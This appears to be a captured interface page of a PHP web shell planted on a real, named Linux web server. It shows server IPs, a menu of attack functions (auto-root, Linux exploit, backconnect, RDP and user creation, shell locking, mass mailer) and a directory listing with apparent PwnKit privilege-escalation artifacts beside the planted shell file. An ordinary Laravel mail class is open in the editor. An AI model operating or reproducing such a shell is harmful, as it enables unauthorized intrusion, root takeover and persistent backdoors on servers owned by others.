Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo7.com /
app /
Mail /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
InstructorApproval.php
1.11
KB
-rw-rw-r--
UserForgetPassword.php
1.24
KB
-rw-rw-r--
UserRegistration.php
1.23
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UserRegistration.php
<?php namespace App\Mail; use Illuminate\Bus\Queueable; use Illuminate\Contracts\Queue\ShouldQueue; use Illuminate\Mail\Mailable; use Illuminate\Mail\Mailables\Content; use Illuminate\Mail\Mailables\Envelope; use Illuminate\Queue\SerializesModels; class UserRegistration extends Mailable { use Queueable, SerializesModels; /** * Create a new message instance. */ public $mail_subject; public $mail_message; public $from_user; public function __construct($mail_message, $mail_subject, $from_user) { $this->mail_subject = $mail_subject; $this->mail_message = $mail_message; $this->from_user = $from_user; } /** * Get the message envelope. */ public function envelope(): Envelope { return new Envelope( subject: $this->mail_subject, ); } /** * Get the message content definition. */ public function content(): Content { return new Content( view: 'auth.email_verify_mail', ); } /** * Get the attachments for the message. * * @return array<int, \Illuminate\Mail\Mailables\Attachment> */ public function attachments(): array { return []; } }
Close